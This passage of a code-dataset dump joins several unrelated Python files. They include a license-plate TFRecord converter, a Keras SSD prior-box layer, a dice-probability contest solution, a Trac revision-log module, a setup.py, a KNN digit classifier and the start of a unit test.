Should contain all the images\")\n\nparser.add_argument(\"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"The output dir for resized images\")\n\nargs = parser.parse_args()\n\nIMAGE_DIR = Path(args.data)\nINPUT_SIZE_H = 320\nINPUT_SIZE_W = 320\n\nOUTPUT_DIR = Path(args.output_dir)\nif not OUTPUT_DIR.exists():\n OUTPUT_DIR.mkdir()\n\n\ndef int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef int64_list_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef bytes_list_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=value))\n\n\ndef float_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n\ndef float_list_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=value))\n\n\ndef spilt_train_val(image_names, val_ratio=0.15):\n np.random.shuffle(image_names)\n train_keys, validation_keys = (\n image_names[int(len(image_names) * val_ratio):],\n image_names[: int(len(image_names) * val_ratio)],\n )\n return train_keys, validation_keys\n\n\ndef create_tf_example(info):\n tf_example = tf.train.Example(features=tf.train.Features(feature={\n 'image/height': int64_feature(info[\"height\"]),\n 'image/width': int64_feature(info[\"width\"]),\n 'image/filename': bytes_feature(info[\"filename\"]),\n 'image/source_id': bytes_feature(info[\"source_id\"]),\n 'image/encoded': bytes_feature(info[\"encoded\"]),\n 'image/format': bytes_feature(info[\"format\"]),\n 'image/object/bbox/xmin': float_list_feature(info[\"xmin\"]),\n 'image/object/bbox/xmax': float_list_feature(info[\"xmax\"]),\n 'image/object/bbox/ymin': float_list_feature(info[\"ymin\"]),\n 'image/object/bbox/ymax': float_list_feature(info[\"ymax\"]),\n 'image/object/class/text': bytes_list_feature(info[\"text\"]),\n 'image/object/class/label': int64_list_feature(info[\"label\"]),\n }))\n return tf_example\n\n# 获取 bounding-box 信息\n# 输入:image path\n# 返回:\n# bounding box\n\n\ndef get_bounding_box(image_name, xratio=1, yratio=1):\n kp = []\n kp_serial = image_name.split('-')[3].split('_')\n\n for i in range(0, 4):\n tmp = kp_serial[i].split('&')\n kp.append(int(tmp[0]))\n kp.append(int(tmp[1]))\n\n # 左上角点\n tlx = min(kp[2], kp[4]) * xratio\n tly = min(kp[5], kp[7]) * yratio\n\n # 右下角点\n brx = max(kp[0], kp[6]) * xratio\n bry = max(kp[1], kp[3]) * yratio\n\n return (tlx, tly, brx, bry)\n\n\ndef write_tf_record(writer, img_files):\n\n for img_file in img_files:\n image = Image.open(img_file).crop(\n (0, 0, 720, 720)).resize((INPUT_SIZE_W, INPUT_SIZE_H))\n # 获取boundingbox的左上角、右下角\n xratio = INPUT_SIZE_W / 720.0\n yratio = INPUT_SIZE_H / 720.0\n\n with io.BytesIO() as output:\n image.save(output, format=\"JPEG\")\n encoded_jpg = output.getvalue()\n\n bounding_box = get_bounding_box(img_file.name, xratio, yratio)\n\n if (bounding_box[0] > INPUT_SIZE_W or bounding_box[1] > INPUT_SIZE_H or bounding_box[2] > INPUT_SIZE_W or bounding_box[3] > INPUT_SIZE_H):\n continue\n\n # 图片信息\n info = {\n 'height': image.height,\n 'width': image.width,\n 'filename': img_file.name.encode('utf8'),\n 'source_id': img_file.name.encode('utf8'),\n 'encoded': encoded_jpg,\n 'format': b'jpg',\n 'xmin': [bounding_box[0] / image.width],\n 'xmax': [bounding_box[2] / image.width],\n 'ymin': [bounding_box[1] / image.height],\n 'ymax': [bounding_box[3] / image.height],\n 'text': 
[b'plate'],\n 'label': [1],\n }\n\n example = create_tf_example(info)\n writer.write(example.SerializeToString())\n\n\ndef main():\n\n # 加载图片信息\n img_files = [f for f in IMAGE_DIR.iterdir()]\n img_files.sort(key=lambda f: f.stem, reverse=True) # 排序,防止顺序错乱、数据和标签不对应\n train_files, val_files = spilt_train_val(img_files)\n\n with tf.io.TFRecordWriter(str(OUTPUT_DIR.joinpath(\"train.tfrecord\"))) as writer:\n write_tf_record(writer, train_files)\n\n with tf.io.TFRecordWriter(str(OUTPUT_DIR.joinpath(\"val.tfrecord\"))) as writer:\n write_tf_record(writer, val_files)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ccpd_to_tfrecord.py","file_name":"ccpd_to_tfrecord.py","file_ext":"py","file_size_in_byte":4975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"90610894","text":"# -*- coding:utf-8 -*-\nimport re\n\n\ndef ignoreWS(str):\n\t\"\"\"将str左右的空白字符去掉\"\"\"\n\tresult = re.match(r'^[ \\t\\n\\r]*(.*?)[ \\t\\n\\r]*$', str)\n\tretV = result.group(1) if result else \"\"\n\treturn retV\n\n\ndef list2str(ls, ls_type=\"conditions\"):\n\tstring = \"\"\n\tif not isinstance(ls, list):\n\t\treturn str(ls)\n\tif ls_type == \"conditions\":\n\t\tfor idx, ele in enumerate(ls):\n\t\t\tls[idx] = list2str(ele, ls_type)\n\t\tstring = \"[\" + \",\".join(ls) + \"]\"\n\treturn string\n\n\ndef str2list(string=\"\", content_type=\"tree\"):\n\t\"\"\"\n\t将str形式的list转成list。\n\n\t:param string: str 形式的list\n\t:param content_type: list内容,现有 tree, int,conditions\n\t:return: list\n\t\"\"\"\n\n\tstring = string.decode(\"utf-8\") if isinstance(string, str) else string\n\n\tif string[0] != \"[\" or string[-1] != \"]\":\n\t\treturn string\n\tif len(string) == 2:\n\t\treturn []\n\tif content_type == \"tree\":\n\t\tls = []\n\t\tstart_idx = 0\n\t\tcur_idx = 0\n\t\tcount = 0\n\t\tstr_len = len(string) - 1\n\t\twhile True:\n\t\t\tl_bracket_idx = string.find(\"(\", cur_idx)\n\t\t\tr_bracket_idx = string.find(\")\", cur_idx)\n\t\t\tif l_bracket_idx == -1:\n\t\t\t\t# 从cur_idx 到最后都是一个tree\n\t\t\t\tls.append(string[start_idx+1: -1])\n\t\t\t\tbreak\n\t\t\telif l_bracket_idx < r_bracket_idx:\n\t\t\t\tcount += 1\n\t\t\t\tcur_idx = l_bracket_idx+1\n\t\t\telif r_bracket_idx == -1:\n\t\t\t\traise IndexError\n\t\t\telse:\n\t\t\t\tcount -= 1\n\t\t\t\tcur_idx = r_bracket_idx + 1\n\t\t\t\tif count == 0:\n\t\t\t\t\tls.append(string[start_idx + 1: r_bracket_idx+1])\n\t\t\t\t\tstart_idx = cur_idx = r_bracket_idx + 1\n\t\t\t\t\tif start_idx >= str_len:\n\t\t\t\t\t\tbreak\n\telse:\n\t\t# 格式化list中各项\n\t\tif content_type == \"int\":\n\t\t\tls = string[1:-1].split(\",\")\n\t\t\tfor idx, ele in enumerate(ls):\n\t\t\t\tls[idx] = int(ele)\n\t\telif content_type == \"conditions\":\n\t\t\t# string like:'[[TRUE,TRUE,TRUE],[IS_GT,age,12]]'\n\t\t\tls = string[:-1].split(\"]\")\n\t\t\t# ls like: ['[TRUE,TRUE,TRUE','[IS_GT,age,12']\n\t\t\tfor idx, ele in enumerate(ls):\n\t\t\t\tif ele != \"\":\n\t\t\t\t\tls[idx] = ele[2:].split(\",\")\n\t\t\t\telse:\n\t\t\t\t\tls.pop(idx)\n\treturn ls\n","sub_path":"Utils_string.py","file_name":"Utils_string.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"518619273","text":"import keras.backend as K\nimport tensorflow as tf\nimport numpy as np\nimport keras\n\nclass PriorBox(keras.layers.Layer):\n def __init__(self, image_size, min_size, aspect_ratio, max_size=None,\n flip=True, clip=True, variances=[0.1], **kwargs):\n self.image_size = image_size\n self.min_size = 
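# How get_bounding_box above decodes a CCPD file name: field 3 (split on '-')
# carries four "x&y" corner points separated by '_', and the axis-aligned box
# comes from their extremes. Taking min/max over all four corners is a
# simplification of the per-index arithmetic above, equivalent for a convex
# plate quadrilateral. The sample name below is synthetic, shaped like real
# CCPD names only in the fields this code reads.
name = "025-95_113-154&383_386&473-386&473_177&454_154&383_363&402-0_0_22_27_27_33_16-37-15.jpg"

corners = [tuple(map(int, p.split("&"))) for p in name.split("-")[3].split("_")]
xs = [x for x, _ in corners]
ys = [y for _, y in corners]
tlx, tly, brx, bry = min(xs), min(ys), max(xs), max(ys)
print((tlx, tly, brx, bry))   # -> (154, 383, 386, 473)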
min_size\n self.max_size = max_size\n self.clip = clip\n self.flip = flip\n if(len(variances) == 1):\n self.variances = variances * 4\n elif(len(variances) == 4):\n self.variances = variances\n else:\n self.variances = [0.1, 0.1, 0.2, 0.2]\n\n self.wi, self.hi = 2, 1\n self.aspect_ratio = [1.0]\n if max_size:\n self.aspect_ratio.append(1.0)\n if aspect_ratio:\n for ar in aspect_ratio:\n if ar in self.aspect_ratio:\n continue\n self.aspect_ratio.append(ar)\n if flip:\n self.aspect_ratio.append(1.0 / ar)\n\n box_width, box_height = [], []\n for ar in self.aspect_ratio:\n if ar == 1 and len(box_width) == 0:\n box_width.append(self.min_size)\n box_height.append(self.min_size)\n elif ar == 1 and len(box_width) > 0:\n box_width.append(np.sqrt(self.min_size * self.max_size))\n box_height.append(np.sqrt(self.min_size * self.max_size))\n elif ar != 1:\n box_width.append(self.min_size * np.sqrt(ar))\n box_height.append(self.min_size / np.sqrt(ar))\n self.box_width = 0.5 * np.array(box_width)\n self.box_height = 0.5 * np.array(box_height)\n\n super(PriorBox, self).__init__(**kwargs)\n\n def compute_output_shape(self, input_shape):\n num_p = len(self.aspect_ratio)\n width = input_shape[self.wi]\n height = input_shape[self.hi]\n num_boxes = num_p * width * height\n return input_shape[0], num_boxes, 8\n\n def call(self, input, **kwargs):\n\n # input_shape = K.int_shape(input)\n input_shape = input._keras_shape\n layer_width, layer_height = input_shape[self.wi], input_shape[self.hi]\n img_width, img_height = self.image_size[0], self.image_size[1]\n\n box_width = img_width / layer_width\n box_height = img_height / layer_height\n cbw, cbh = box_width / 2, box_height / 2\n linx = np.linspace(cbw, img_width - cbw, layer_width)\n liny = np.linspace(cbh, img_height - cbh, layer_height)\n origin = np.zeros(shape=(layer_width * layer_height * len(self.aspect_ratio), 8))\n\n p = 0\n for xi in range(linx.shape[0]):\n for yi in range(liny.shape[0]):\n for i in range(len(self.aspect_ratio)):\n center_x, center_y = linx[xi], liny[yi]\n bw, bh = self.box_width[i], self.box_height[i]\n xmin, ymin = center_x - bw, center_y - bh\n xmax, ymax = center_x + bw, center_y + bh\n xmin, xmax = xmin / img_width, xmax / img_width\n ymin, ymax = ymin / img_height, ymax / img_height\n origin[p] = xmin, ymin, xmax, ymax, \\\n self.variances[0], self.variances[1], self.variances[2], self.variances[3]\n p += 1\n\n if self.clip:\n origin = np.minimum(np.maximum(origin, 0.0), 1.0)\n origin = K.expand_dims(K.variable(origin), 0)\n pattern = [tf.shape(input)[0], 1, 1]\n tensor = tf.tile(origin, pattern)\n return tensor\n\n","sub_path":"src/Layers/PriorBox.py","file_name":"PriorBox.py","file_ext":"py","file_size_in_byte":3606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"372135960","text":"import math\n\ndef fact(n):\n result = 1\n for i in range(1,n+1):\n result *= i\n return result\n\ndef combination(n,r):\n return fact(n)/(fact(n-r) * fact(r))\n\ndef comb(n,r):\n digit = n\n numerator = 1\n for _ in range(r):\n numerator *= digit\n digit -= 1\n denominator = fact(r)\n return numerator//denominator\ndef hackercup():\n T = int(input())\n for i in range(T):\n H, S = input().split(\" \")\n H = int(H)\n spells = input().split(\" \")\n probabilities = []\n for spell in spells:\n add = False\n if '+' in spell:\n add = True\n spell = spell.split(\"+\")\n else:\n spell = spell.split(\"-\")\n spell = spell[0].split(\"d\") + spell\n spell.pop(2)\n if len(spell) == 2:\n spell.append(0)\n 
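# The box geometry computed in PriorBox.__init__ above, isolated and slightly
# simplified (duplicate-ratio skipping omitted): one square box at min_size,
# one at sqrt(min_size * max_size), and a stretched pair per extra aspect
# ratio plus its flip. Assumes only numpy; the sizes are example values, not
# from any particular SSD configuration.
import numpy as np

def prior_box_sizes(min_size, max_size, ratios, flip=True):
    widths, heights = [min_size], [min_size]
    if max_size:
        s = np.sqrt(min_size * max_size)
        widths.append(s)
        heights.append(s)
    for ar in ratios:
        widths.append(min_size * np.sqrt(ar))
        heights.append(min_size / np.sqrt(ar))
        if flip:
            widths.append(min_size * np.sqrt(1.0 / ar))
            heights.append(min_size / np.sqrt(1.0 / ar))
    return np.array(widths), np.array(heights)

w, h = prior_box_sizes(30.0, 60.0, [2.0])
print(np.round(w, 2), np.round(h, 2))  # full sizes, before the 0.5 halving used above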
for j in range(len(spell)):\n spell[j] = int(spell[j])\n if not add:\n spell[2] = -1 * spell[2]\n minimum_possible = 1 * spell[0] + spell[2]\n total_ways = math.pow(spell[1], spell[0])\n coeffs = expandPoly(spell[0], spell[1])\n res = 0\n if H-minimum_possible >=0:\n for j in coeffs[H-minimum_possible:]:\n res += j\n probabilities.append(getProbability(res, total_ways))\n print(\"Case #\" + str(i+1) + \": \" + str(format(round(sorted(probabilities)[-1], 6), \".6f\")))\n\n\ndef getProbability(num_of_success_ways, total_ways):\n return num_of_success_ways/int(total_ways)\n\n\ndef getCoeff(n, k, no_of_sides):\n\n if(k/no_of_sides >= 1):\n coefficient = 0\n for j in range(int(k/no_of_sides)+1):\n coefficient += (int(math.pow(-1, j)) * comb(n, j) * comb((n+k-1)-(no_of_sides*j), n-1))\n else:\n j = 0\n coefficient = (int(math.pow(-1, j)) * comb(n, j) * comb((n + k - 1) - (no_of_sides * j), n - 1))\n return coefficient\n\ndef expandPoly(dieRollCount, noOfSides):\n coefficients = []\n noOfCoefficients = (dieRollCount*(noOfSides - 1))+1\n coefficients.append(1)\n for i in range(1, noOfCoefficients):\n coefficients.append(int(getCoeff(dieRollCount, i, noOfSides)))\n return coefficients\n\nif __name__ == '__main__':\n hackercup()","sub_path":"Facebook Hackercup/45:Fighting the Zombie.py","file_name":"45:Fighting the Zombie.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"586898526","text":"# -*- coding: iso8859-1 -*-\n#\n# Copyright (C) 2003-2005 Edgewall Software\n# Copyright (C) 2003-2005 Jonas Borgström \n# All rights reserved.\n#\n# This software is licensed as described in the file COPYING, which\n# you should have received as part of this distribution. The terms\n# are also available at http://trac.edgewall.com/license.html.\n#\n# This software consists of voluntary contributions made by many\n# individuals. 
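# The polynomial-coefficient trick behind getCoeff above, checked against
# brute force: the number of ways n fair s-sided dice total t is the
# inclusion-exclusion sum over j of (-1)^j * C(n, j) * C(t - s*j - 1, n - 1).
# Self-contained sketch; small n and s keep the itertools check cheap.
# Requires Python 3.8+ for math.comb.
from itertools import product
from math import comb

def ways(n, s, t):
    return sum((-1) ** j * comb(n, j) * comb(t - s * j - 1, n - 1)
               for j in range((t - n) // s + 1))

def ways_brute(n, s, t):
    return sum(1 for roll in product(range(1, s + 1), repeat=n) if sum(roll) == t)

assert all(ways(3, 6, t) == ways_brute(3, 6, t) for t in range(3, 19))
print(ways(3, 6, 10))  # 27 ways for three d6 to sum to 10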
For the exact contribution history, see the revision\n# history and logs, available at http://projects.edgewall.com/trac/.\n#\n# Author: Jonas Borgström \n# Christian Boos \n\nfrom __future__ import generators\nimport re\nimport urllib\n\nfrom trac import util\nfrom trac.core import *\nfrom trac.perm import IPermissionRequestor\nfrom trac.web import IRequestHandler\nfrom trac.web.chrome import add_link, add_stylesheet, INavigationContributor\nfrom trac.wiki import IWikiSyntaxProvider\nfrom trac.versioncontrol import Changeset\nfrom trac.versioncontrol.web_ui.util import *\n\nLOG_LIMIT = 100\n\nclass LogModule(Component):\n\n implements(INavigationContributor, IPermissionRequestor, IRequestHandler,\n IWikiSyntaxProvider)\n\n # INavigationContributor methods\n\n def get_active_navigation_item(self, req):\n return 'browser'\n\n def get_navigation_items(self, req):\n return []\n\n # IPermissionRequestor methods\n\n def get_permission_actions(self):\n return ['LOG_VIEW']\n\n # IRequestHandler methods\n\n def match_request(self, req):\n import re\n match = re.match(r'/log(?:(/.*)|$)', req.path_info)\n if match:\n req.args['path'] = match.group(1) or '/'\n return 1\n\n def process_request(self, req):\n req.perm.assert_permission('LOG_VIEW')\n\n mode = req.args.get('mode', 'stop_on_copy')\n path = req.args.get('path', '/')\n rev = req.args.get('rev')\n format = req.args.get('format')\n stop_rev = req.args.get('stop_rev')\n verbose = req.args.get('verbose')\n limit = LOG_LIMIT\n\n req.hdf['title'] = path + ' (log)'\n req.hdf['log'] = {\n 'mode': mode,\n 'path': path,\n 'rev': rev,\n 'verbose': verbose,\n 'stop_rev': stop_rev,\n 'browser_href': self.env.href.browser(path),\n 'log_href': self.env.href.log(path, rev=rev)\n }\n\n path_links = get_path_links(self.env.href, path, rev)\n req.hdf['log.path'] = path_links\n if path_links:\n add_link(req, 'up', path_links[-1]['href'], 'Parent directory')\n\n repos = self.env.get_repository(req.authname)\n normpath = repos.normalize_path(path)\n rev = str(repos.normalize_rev(rev))\n\n # ''Node history'' uses `Node.history()`,\n # ''Path history'' uses `Repository.get_path_history()`\n if mode == 'path_history':\n def history(limit):\n for h in repos.get_path_history(path, rev, limit):\n yield h\n else:\n history = get_existing_node(self.env, repos, path, rev).get_history\n\n # -- retrieve history, asking for limit+1 results\n info = []\n previous_path = repos.normalize_path(path)\n for old_path, old_rev, old_chg in history(limit+1):\n if stop_rev and repos.rev_older_than(old_rev, stop_rev):\n break\n old_path = repos.normalize_path(old_path)\n item = {\n 'rev': str(old_rev),\n 'path': str(old_path),\n 'log_href': self.env.href.log(old_path, rev=old_rev),\n 'browser_href': self.env.href.browser(old_path, rev=old_rev),\n 'changeset_href': self.env.href.changeset(old_rev),\n 'change': old_chg\n }\n if not (mode == 'path_history' and old_chg == Changeset.EDIT):\n info.append(item)\n if old_path and old_path != previous_path \\\n and not (mode == 'path_history' and old_path == normpath):\n item['copyfrom_path'] = old_path\n if mode == 'stop_on_copy':\n break\n if len(info) > limit: # we want limit+1 entries\n break\n previous_path = old_path\n if info == []:\n # FIXME: we should send a 404 error here\n raise TracError(\"The file or directory '%s' doesn't exist \"\n \"at revision %s or at any previous revision.\"\n % (path, rev), 'Nonexistent path')\n\n def make_log_href(path, **args):\n link_rev = rev\n if rev == str(repos.youngest_rev):\n link_rev = None\n params 
= {'rev': link_rev, 'mode': mode, 'limit': limit}\n params.update(args)\n if verbose:\n params['verbose'] = verbose\n return self.env.href.log(path, **params)\n\n if len(info) == limit+1: # limit+1 reached, there _might_ be some more\n next_rev = info[-1]['rev']\n next_path = info[-1]['path']\n add_link(req, 'next', make_log_href(next_path, rev=next_rev),\n 'Revision Log (restarting at %s, rev. %s)'\n % (next_path, next_rev))\n # now, only show 'limit' results\n del info[-1]\n \n req.hdf['log.items'] = info\n\n changes = get_changes(self.env, repos, [i['rev'] for i in info],\n verbose, req, format)\n if format == 'rss':\n # Get the email addresses of all known users\n email_map = {}\n for username,name,email in self.env.get_known_users():\n if email:\n email_map[username] = email\n for cs in changes.values():\n cs['message'] = util.escape(cs['message'])\n cs['shortlog'] = util.escape(cs['shortlog'].replace('\\n', ' '))\n # For RSS, author must be an email address\n author = cs['author']\n author_email = ''\n if '@' in author:\n author_email = author\n elif email_map.has_key(author):\n author_email = email_map[author]\n cs['author'] = author_email\n cs['date'] = util.http_date(cs['date_seconds'])\n elif format == 'changelog':\n for cs in changes.values():\n cs['message'] = '\\n'.join(['\\t' + m for m in\n cs['message'].split('\\n')])\n req.hdf['log.changes'] = changes\n\n if req.args.get('format') == 'changelog':\n return 'log_changelog.cs', 'text/plain'\n elif req.args.get('format') == 'rss':\n return 'log_rss.cs', 'application/rss+xml'\n\n add_stylesheet(req, 'common/css/browser.css')\n add_stylesheet(req, 'common/css/diff.css')\n\n rss_href = make_log_href(path, format='rss', stop_rev=stop_rev)\n add_link(req, 'alternate', rss_href, 'RSS Feed', 'application/rss+xml',\n 'rss')\n changelog_href = make_log_href(path, format='changelog',\n stop_rev=stop_rev)\n add_link(req, 'alternate', changelog_href, 'ChangeLog', 'text/plain')\n\n return 'log.cs', None\n\n # IWikiSyntaxProvider methods\n \n def get_wiki_syntax(self):\n yield (r\"!?\\[\\d+:\\d+\\]|(?:\\b|!)r\\d+:\\d+\\b\",\n lambda x, y, z: self._format_link(x, 'log',\n '#'+(y[0] == 'r' and y[1:]\n or y[1:-1]), y))\n\n def get_link_resolvers(self):\n yield ('log', self._format_link)\n\n def _format_link(self, formatter, ns, path, label):\n path, rev, line = get_path_rev_line(path)\n stop_rev = None\n if rev and ':' in rev:\n stop_rev, rev = rev.split(':', 1)\n label = urllib.unquote(label)\n return '%s' \\\n % (formatter.href.log(path, rev=rev, stop_rev=stop_rev), label)\n","sub_path":"0.9-0beta2+r2418-1/trac/versioncontrol/web_ui/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"3203646","text":"#!/usr/bin/python3\n\nfrom pyrob.api import *\n\n\n@task\ndef task_7_5():\n goal = 0\n now = 0\n move_right()\n fill_cell()\n while not wall_is_on_the_right():\n if now > goal:\n fill_cell()\n now = 0\n goal += 1\n now += 1\n move_right()\n\n\nif __name__ == '__main__':\n run_tasks()\n","sub_path":"task_27.py","file_name":"task_27.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"605131160","text":"# -*- coding: utf-8 -*-\n#-##########################################################################-#\n#\n# xooof - http://www.xooof.org\n# A development and XML specification framework for documenting and\n# developing the services 
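# The route matching used by LogModule.match_request above, in isolation:
# r'/log(?:(/.*)|$)' accepts both a bare /log and /log/some/path, with the
# captured path group falling back to '/' when absent. Standalone sketch,
# standard library only.
import re

def match_log_path(path_info):
    m = re.match(r'/log(?:(/.*)|$)', path_info)
    return (m.group(1) or '/') if m else None

assert match_log_path('/log') == '/'
assert match_log_path('/log/trunk/setup.py') == '/trunk/setup.py'
assert match_log_path('/browser/trunk') is None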
layer of enterprise business applications.\n# From the specifications, it generates WSDL, DocBook, client-side and\n# server-side code for Java, C# and Python.\n#\n# Copyright (C) 2006 Software AG Belgium\n#\n# This file is part of xooof.\n#\n# xooof is free software; you can redistribute it and/or modify it\n# under the terms of the GNU General Public License as published by the\n# Free Software Foundation; either version 2 of the License, or (at\n# your option) any later version.\n#\n# xooof is distributed in the hope that it will be useful, but WITHOUT\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or\n# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License\n# for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n#-##########################################################################-#\nfrom setuptools import setup, find_packages\nimport os\n\nversion = '0.1.1'\n\nsetup(name='xooof.schema.dev',\n version=version,\n description=\"The zope schema parts of the xooof runtime development\" \\\n \" tools for python\",\n long_description=open(\"README.txt\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n classifiers=[\n \"Framework :: Plone\",\n \"Framework :: Zope2\",\n \"Framework :: Zope3\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n keywords='',\n author='Laurent Mignon',\n author_email='laurent.mignon__at__softwareag.com',\n url='http://sourceforge.net/projects/xooof/',\n license='GNU Lesser General Public License',\n package_dir={'': 'src'},\n packages=find_packages('src'),\n namespace_packages=['xooof', 'xooof.schema'],\n include_package_data=True,\n zip_safe=False,\n dependency_links = [\n ],\n install_requires=[\n 'setuptools',\n 'xooof.spectools',\n 'i18ndude >=3.0b4, <4',\n ],\n entry_points= {\n 'console_scripts':\n ['struct2zschema = xooof.schema.dev.structtozschema:main',\n 'struct2po = xooof.schema.dev.structtopo:main']},\n )\n","sub_path":"pypi_install_script/xooof.schema.dev-0.1.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"521360112","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 19 21:28:59 2017\n\n@author: yuanqi\n\nStupid KNN Version.\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom PIL import Image\nimport time\n\ndef get_eig(data_mat):\n \"\"\"\n 返回特征值和特征向量\n \"\"\"\n mean_vals = np.mean(data_mat, axis = 0)\n mean_removed = data_mat - mean_vals\n cov_mat = np.cov(mean_removed, rowvar = 0)\n eigvals, eigvects = np.linalg.eig(np.mat(cov_mat)) \n return eigvals, eigvects\n \ndef pca(data_mat, acc = 0.99):\n \"\"\"\n 降维:返回降维后的矩阵和特征向量(事实证明降维效果太差了, 0.99的精确度降到了710维)\n \"\"\"\n mean_vals = np.mean(data_mat, axis = 0)\n mean_removed = data_mat - mean_vals\n eigvals, eigvects = get_eig(data_mat)\n eigval_ind = np.argsort(eigvals)\n var_vals = np.var(data_mat, axis = 0)\n var_vals = np.array(var_vals)[0]\n sum_var_vals = sum(var_vals)\n feature_num = None\n tmp_sum = 0.\n for i in range(data_mat.shape[1]):\n tmp_sum += var_vals[i]\n if tmp_sum / sum_var_vals > acc:\n feature_num = i\n break\n\n eigval_ind = eigval_ind[:-(feature_num + 1): -1] \n red_eig_vects = eigvects[:, eigval_ind] \n low_data_mat = 
mean_removed * red_eig_vects\n return low_data_mat,red_eig_vects\n \ndef low_input_vec(low_data_mat, eig_vects, input_vec):\n \"\"\"\n 返回降维后的输入变量\n \"\"\"\n mean = np.mean(input_vec)\n mean_removed = input_vec - mean\n ret_vec = mean_removed * eig_vects\n return ret_vec\n\ndef load_data_set(filename = '../input/train.csv', train_propotion = 1.0):\n \"\"\"\n filename: 训练集路径\n train_propotion: 验证集所占比例 \n 返回训练集和验证集\n \"\"\"\n train_set = pd.read_csv('../input/train.csv')\n train_num = int(train_set.shape[0] * train_propotion)\n \n label = np.array(train_set.iloc[:, 0])\n pixel_mat = np.array(train_set.iloc[:, 1:])\n \n train_label = label[:train_num]\n train_pixel_mat = pixel_mat[:train_num]\n \n valid_label = label[train_num:]\n valid_pixel_mat = pixel_mat[train_num:]\n\n return train_pixel_mat, train_label, valid_pixel_mat, valid_label\n \ndef load_test_set(filename = '../input/test.csv'):\n \"\"\"\n 返回测试集\n \"\"\"\n test_set = pd.read_csv(filename) \n pixel_mat = np.array(test_set.iloc[:,:])\n return pixel_mat\n \n\ndef knn(pixel_mat, label, input_vec, k = 10):\n \"\"\"\n 返回分类结果\n \"\"\"\n dist = []\n for pixel_row in pixel_mat:\n euclidean_dist = np.sqrt(sum(np.square(input_vec - pixel_row))) # 计算欧式距离\n dist.append(euclidean_dist)\n \n label_dist_pair = list(zip(label, dist))\n label_dist_pair.sort(key = lambda i: i[1])\n \n top_k = np.array(label_dist_pair[:k])\n label_set = set(top_k[:,0])\n label_count = dict(zip(label_set, [0] * len(label_set)))\n for item in top_k:\n label_count[item[0]] += 1\n label = max(label_count.items(), key = lambda item: item[1])[0]\n return int(label)#, label_count\n\ndef generate_pic(input_vec, filename):\n \"\"\"\n 根据输入向量产生图片\n \"\"\"\n data_mat = []\n for i in range(0, input_vec.shape[0], 28):\n data_mat.append(input_vec[i:i+28]) \n img = Image.fromarray(np.array(np.uint8(data_mat)))\n img.save(filename)\n\ndef validate(train_pixel_mat, train_label, valid_pixel_mat, valid_label): \n right_predict = 0. 
\n for i, valid_item in enumerate(valid_pixel_mat):\n label = knn(train_pixel_mat, train_label, valid_item)\n print (label, valid_label[i])\n if label == valid_label[i]:\n right_predict += 1.\n acc = right_predict / valid_pixel_mat.shape[0] \n return acc\n\ndef test(test_pixel_mat, train_pixel_mat, train_label, filename=\"result.csv\"):\n \"\"\"\n 生成训练结果保存为csv文件\n \"\"\"\n f = open(filename, \"w\")\n f.write(\"ImageId,Label\\n\")\n for i, item in enumerate(test_pixel_mat):\n label = knn(train_pixel_mat, train_label, item)\n #print(\"{0},{1}\".format(i + 1, label))\n f.write(\"{0},{1}\\n\".format(i + 1, label))\n\nif __name__ == \"__main__\":\n start = time.time()\n train_pixel_mat, train_label, valid_pixel_mat, valid_label = load_data_set()\n #acc = validate(train_pixel_mat, train_label, valid_pixel_mat, valid_label)\n #print (acc)\n test_pixel_mat = load_test_set()\n \n #train_pixel_mat = pca(train_pixel_mat)\n #valid_pixel_mat = pca(valid_pixel_mat) \n #test_pixel_mat = pca(test_pixel_mat)\n \n #test(test_pixel_mat, train_pixel_mat, train_label, filename=\"result.csv\")\n end = time.time()\n print (start - end)\n ","sub_path":"digit-recognizer/code/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"49162877","text":"import unittest\nfrom unittest import mock\nfrom transiter.utils import servicepatternmanager\nfrom transiter.utils import gtfsstaticutil\nfrom transiter.utils import graphutils\nfrom transiter import models\n\n\nclass TestServicePatternManager(unittest.TestCase):\n def setUp(self):\n\n self.trip_one = gtfsstaticutil.StaticTrip()\n self.trip_one.stop_ids = []\n self.trip_one.route_id = 'C'\n self.trip_two = gtfsstaticutil.StaticTrip()\n self.trip_two.stop_ids = ['1', '2']\n self.trip_two.route_id = 'A'\n self.trip_two.direction_id = False\n self.trip_three = gtfsstaticutil.StaticTrip()\n self.trip_three.stop_ids = ['3', '4']\n self.trip_three.route_id = 'A'\n 